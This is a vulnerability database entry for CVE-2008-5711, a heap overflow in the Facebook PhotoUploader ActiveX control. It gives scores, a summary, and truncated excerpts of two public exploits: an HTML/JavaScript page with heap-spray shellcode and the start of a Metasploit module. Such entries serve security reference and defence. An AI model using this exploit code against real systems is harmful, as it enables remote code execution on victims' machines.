
CVE-2008-5711

Published: 24/12/2008 Updated: 29/09/2017
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 945
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Heap-based buffer overflow in the Facebook PhotoUploader ActiveX control 5.0.14.0 and previous versions allows remote malicious users to execute arbitrary code via a long FileMask property value.

Vulnerable Product

facebook photouploader 4.5.57.0

facebook photouploader

Exploits

<!--
FaceBook PhotoUploader Buffer Overflow Exploit
written by eb
Tested on Windows XP SP2 (fully patched) English, IE6, ImageUploader4.ocx 4.5.57.0 (FaceBookPhotoUploader2.cab)
The following controls are also vulnerable: Aurigma ImageUploader4 45700 and 451260
-----------------------------
{6E5E167B-1566-4316-B27F-0DDAB3484CF7} Buffer ...
<html> <head> <object id="target" classid="clsid:5C6698D9-7BE4-4122-8EC5-291D84DBD4A0"></object> </head> <body> <script> var shellcode = unescape("%u0D0D%u0D0D%u9090%u9090"+ //Windows Execute Command (calc) "%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b"+ "%u0120%u49eb%u348b%u018b%u31ee% ...
##
# $Id: facebook_extractiptc.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# metasploit.com/framework/
##

require 'msf/core'

c ...